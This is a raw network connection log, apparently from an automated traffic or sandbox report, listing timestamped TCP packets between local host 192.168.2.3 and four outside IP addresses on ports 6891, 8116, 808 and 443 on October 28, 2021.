Oct 28, 2021 05:27:42.945473909 CEST	49966	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:42.948082924 CEST	49966	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:43.068403959 CEST	49968	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:43.096210003 CEST	8116	49967	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:43.096256018 CEST	8116	49967	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:43.096343040 CEST	49967	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:43.096373081 CEST	49967	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:43.105251074 CEST	49967	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:43.114244938 CEST	6891	49966	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:43.124872923 CEST	8116	49968	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:43.125087023 CEST	49968	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:43.126449108 CEST	49968	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:43.158466101 CEST	8116	49967	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:43.182605982 CEST	8116	49968	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:43.182755947 CEST	8116	49968	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:43.182863951 CEST	49968	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:43.183604002 CEST	49968	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:43.188518047 CEST	49968	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:43.188631058 CEST	49968	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:43.221501112 CEST	49969	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:43.221541882 CEST	443	49969	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:43.221709013 CEST	49969	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:43.222349882 CEST	49969	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:43.222363949 CEST	443	49969	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:43.244746923 CEST	8116	49968	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:43.245321035 CEST	8116	49968	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:43.430422068 CEST	8116	49968	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:43.430449963 CEST	8116	49968	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:43.430563927 CEST	49968	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:43.434120893 CEST	49968	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:43.490185022 CEST	8116	49968	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:43.571832895 CEST	49970	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:43.571883917 CEST	443	49970	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:43.571990013 CEST	49970	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:43.572743893 CEST	49970	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:43.572773933 CEST	443	49970	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:43.709920883 CEST	443	49969	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:43.710038900 CEST	49969	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:43.710905075 CEST	49969	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:43.710915089 CEST	443	49969	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:43.716418028 CEST	49969	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:43.716430902 CEST	443	49969	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:43.716579914 CEST	49969	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:43.716594934 CEST	443	49969	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:44.077725887 CEST	443	49970	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:44.078203917 CEST	49970	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:44.080687046 CEST	49970	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:44.080713987 CEST	443	49970	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:44.087534904 CEST	49970	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:44.087563038 CEST	443	49970	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:44.087639093 CEST	49970	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:44.087654114 CEST	443	49970	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:44.406090021 CEST	443	49969	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:44.406162024 CEST	443	49969	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:44.406200886 CEST	49969	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:44.406275034 CEST	49969	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:44.412137032 CEST	49969	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:44.412166119 CEST	443	49969	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:44.533324003 CEST	49971	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:44.696474075 CEST	808	49971	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:44.696643114 CEST	49971	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:44.697329044 CEST	49971	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:44.781388044 CEST	443	49970	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:44.781464100 CEST	443	49970	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:44.781516075 CEST	49970	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:44.781549931 CEST	49970	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:44.785192966 CEST	49970	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:44.785232067 CEST	443	49970	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:44.860238075 CEST	808	49971	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:44.860426903 CEST	808	49971	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:44.860516071 CEST	49971	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:44.861099958 CEST	49971	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:44.865720034 CEST	49971	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:44.865844965 CEST	49971	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:44.942116976 CEST	49972	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:45.024019003 CEST	808	49971	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.028762102 CEST	808	49971	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.028779030 CEST	808	49971	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.028888941 CEST	808	49971	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.113502026 CEST	808	49972	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.113610983 CEST	49972	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:45.114504099 CEST	49972	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:45.285567999 CEST	808	49972	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.285748959 CEST	808	49972	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.285849094 CEST	49972	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:45.286426067 CEST	49972	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:45.290777922 CEST	49972	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:45.290915966 CEST	49972	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:45.402395964 CEST	808	49971	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.402412891 CEST	808	49971	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.403652906 CEST	49971	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:45.411629915 CEST	49971	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:45.459145069 CEST	808	49972	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.461988926 CEST	808	49972	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.462001085 CEST	808	49972	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.462049961 CEST	808	49972	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.532465935 CEST	49973	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:45.574700117 CEST	808	49971	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.698367119 CEST	6891	49973	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:45.700634003 CEST	49973	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:45.701558113 CEST	49973	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:45.852174997 CEST	808	49972	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.852191925 CEST	808	49972	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:45.852277040 CEST	49972	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:45.854186058 CEST	49972	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:45.854481936 CEST	49972	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:45.868762970 CEST	6891	49973	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:45.868778944 CEST	6891	49973	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:45.872590065 CEST	49973	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:45.873197079 CEST	49973	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:45.877500057 CEST	49973	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:45.877666950 CEST	49973	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:45.995431900 CEST	49974	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:46.025769949 CEST	808	49972	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:46.044527054 CEST	6891	49973	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:46.044575930 CEST	6891	49973	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:46.161982059 CEST	6891	49974	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:46.162156105 CEST	49974	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:46.162976027 CEST	49974	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:46.328954935 CEST	6891	49974	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:46.329133034 CEST	6891	49974	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:46.329242945 CEST	49974	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:46.330022097 CEST	49974	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:46.336775064 CEST	49974	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:46.337006092 CEST	49974	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:46.429380894 CEST	6891	49973	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:46.429408073 CEST	6891	49973	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:46.429521084 CEST	49973	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:46.443226099 CEST	49973	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:46.505474091 CEST	6891	49974	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:46.505511045 CEST	6891	49974	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:46.564508915 CEST	49975	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:46.609738111 CEST	6891	49973	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:46.618397951 CEST	8116	49975	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:46.618519068 CEST	49975	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:46.619400024 CEST	49975	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:46.673073053 CEST	8116	49975	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:46.673202991 CEST	8116	49975	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:46.673273087 CEST	49975	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:46.673788071 CEST	49975	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:46.677297115 CEST	49975	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:46.677479982 CEST	49975	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:46.731115103 CEST	8116	49975	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:46.731141090 CEST	8116	49975	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:46.731858969 CEST	8116	49975	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:46.890660048 CEST	6891	49974	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:46.890678883 CEST	6891	49974	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:46.890754938 CEST	49974	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:46.893088102 CEST	49974	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:46.903428078 CEST	8116	49975	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:46.903486013 CEST	8116	49975	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:46.903525114 CEST	49975	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:46.903553963 CEST	49975	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:46.910168886 CEST	49975	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:46.963880062 CEST	8116	49975	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:47.027681112 CEST	49976	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:47.033062935 CEST	49977	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:47.033096075 CEST	443	49977	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:47.033185959 CEST	49977	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:47.033648968 CEST	49977	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:47.033658028 CEST	443	49977	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:47.058989048 CEST	6891	49974	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:47.079392910 CEST	8116	49976	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:47.079564095 CEST	49976	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:47.080132961 CEST	49976	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:47.132952929 CEST	8116	49976	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:47.132976055 CEST	8116	49976	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:47.138752937 CEST	49976	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:47.139400005 CEST	49976	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:47.143870115 CEST	49976	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:47.144017935 CEST	49976	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:47.196310997 CEST	8116	49976	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:47.196882010 CEST	8116	49976	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:47.367898941 CEST	8116	49976	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:47.367912054 CEST	8116	49976	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:47.368058920 CEST	49976	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:47.371654034 CEST	49976	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:47.423247099 CEST	8116	49976	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:47.484755039 CEST	49978	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:47.484803915 CEST	443	49978	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:47.484915018 CEST	49978	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:47.485649109 CEST	49978	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:47.485668898 CEST	443	49978	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:47.563990116 CEST	443	49977	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:47.564172983 CEST	49977	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:47.564868927 CEST	49977	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:47.564881086 CEST	443	49977	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:47.569166899 CEST	49977	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:47.569185972 CEST	443	49977	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:47.569382906 CEST	49977	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:47.569400072 CEST	443	49977	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:48.011960983 CEST	443	49978	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:48.012075901 CEST	49978	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:48.012598991 CEST	49978	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:48.012615919 CEST	443	49978	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:48.016309023 CEST	49978	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:48.016330957 CEST	443	49978	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:48.016395092 CEST	49978	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:48.016405106 CEST	443	49978	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:48.280158997 CEST	443	49977	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:48.280222893 CEST	443	49977	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:48.280265093 CEST	49977	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:48.280287981 CEST	49977	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:48.286755085 CEST	49977	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:48.286782980 CEST	443	49977	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:48.408339024 CEST	49979	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:48.568562031 CEST	808	49979	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:48.568777084 CEST	49979	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:48.569659948 CEST	49979	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:48.725281000 CEST	443	49978	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:48.725389957 CEST	443	49978	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:48.725506067 CEST	49978	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:48.725573063 CEST	49978	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:48.729195118 CEST	49978	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:48.729223013 CEST	443	49978	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:48.729708910 CEST	808	49979	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:48.729878902 CEST	808	49979	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:48.730000973 CEST	49979	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:48.730575085 CEST	49979	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:48.735301018 CEST	49979	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:48.735517979 CEST	49979	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:48.848948956 CEST	49980	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:48.891002893 CEST	808	49979	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:48.896027088 CEST	808	49979	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:48.896172047 CEST	808	49979	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:49.008358955 CEST	808	49980	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:49.008611917 CEST	49980	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:49.009555101 CEST	49980	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:49.168539047 CEST	808	49980	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:49.168659925 CEST	808	49980	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:49.168773890 CEST	49980	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:49.169744015 CEST	49980	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:49.173587084 CEST	49980	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:49.173721075 CEST	49980	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:49.273261070 CEST	808	49979	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:49.273297071 CEST	808	49979	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:49.273542881 CEST	49979	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:49.289884090 CEST	49979	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:49.328706980 CEST	808	49980	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:49.332515001 CEST	808	49980	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:49.332566977 CEST	808	49980	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:49.332593918 CEST	808	49980	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:49.412621021 CEST	49981	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:49.450119972 CEST	808	49979	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:49.579061985 CEST	6891	49981	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:49.579265118 CEST	49981	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:49.580013990 CEST	49981	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:49.717149019 CEST	808	49980	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:49.717204094 CEST	808	49980	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:49.717309952 CEST	49980	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:49.717343092 CEST	49980	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:49.720218897 CEST	49980	808	192.168.2.3	143.244.140.214
Oct 28, 2021 05:27:49.746088982 CEST	6891	49981	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:49.746370077 CEST	6891	49981	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:49.746450901 CEST	49981	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:49.746965885 CEST	49981	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:49.751758099 CEST	49981	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:49.751892090 CEST	49981	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:49.851237059 CEST	49982	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:49.879282951 CEST	808	49980	143.244.140.214	192.168.2.3
Oct 28, 2021 05:27:49.917938948 CEST	6891	49981	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:49.917973042 CEST	6891	49981	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:50.017786026 CEST	6891	49982	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:50.017946959 CEST	49982	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:50.018573046 CEST	49982	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:50.184622049 CEST	6891	49982	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:50.184680939 CEST	6891	49982	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:50.184817076 CEST	49982	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:50.186289072 CEST	49982	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:50.196011066 CEST	49982	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:50.196194887 CEST	49982	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:50.297060013 CEST	6891	49981	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:50.297079086 CEST	6891	49981	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:50.297192097 CEST	49981	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:50.297239065 CEST	49981	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:50.309619904 CEST	49981	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:50.362807989 CEST	6891	49982	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:50.363157034 CEST	6891	49982	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:50.363179922 CEST	6891	49982	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:50.423954964 CEST	49983	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.475717068 CEST	6891	49981	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:50.480487108 CEST	8116	49983	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:50.480648041 CEST	49983	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.481424093 CEST	49983	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.536777020 CEST	8116	49983	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:50.537137032 CEST	8116	49983	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:50.537240028 CEST	49983	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.537888050 CEST	49983	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.541846037 CEST	49983	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.541956902 CEST	49983	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.597479105 CEST	8116	49983	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:50.597677946 CEST	8116	49983	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:50.637276888 CEST	8116	49983	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:50.746685028 CEST	6891	49982	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:50.746707916 CEST	6891	49982	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:50.746828079 CEST	49982	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:50.749953985 CEST	49982	6891	192.168.2.3	45.77.0.96
Oct 28, 2021 05:27:50.767003059 CEST	8116	49983	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:50.767034054 CEST	8116	49983	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:50.767162085 CEST	49983	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.774756908 CEST	49983	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.830473900 CEST	8116	49983	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:50.876112938 CEST	49984	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.908607960 CEST	49985	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:50.908649921 CEST	443	49985	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:50.908730984 CEST	49985	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:50.909601927 CEST	49985	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:50.909625053 CEST	443	49985	192.46.210.220	192.168.2.3
Oct 28, 2021 05:27:50.916073084 CEST	6891	49982	45.77.0.96	192.168.2.3
Oct 28, 2021 05:27:50.924546003 CEST	8116	49984	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:50.924664974 CEST	49984	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.925359964 CEST	49984	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.973643064 CEST	8116	49984	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:50.973845005 CEST	8116	49984	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:50.974000931 CEST	49984	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.974589109 CEST	49984	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.978496075 CEST	49984	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:50.978635073 CEST	49984	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:51.026828051 CEST	8116	49984	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:51.026864052 CEST	8116	49984	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:51.027539015 CEST	8116	49984	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:51.197422981 CEST	8116	49984	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:51.197448015 CEST	8116	49984	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:51.197520018 CEST	49984	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:51.197542906 CEST	49984	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:51.200417042 CEST	49984	8116	192.168.2.3	185.56.219.47
Oct 28, 2021 05:27:51.248771906 CEST	8116	49984	185.56.219.47	192.168.2.3
Oct 28, 2021 05:27:51.319735050 CEST	49986	443	192.168.2.3	192.46.210.220
Oct 28, 2021 05:27:51.319782019 CEST	443	49986	192.46.210.220	192.168.2.3
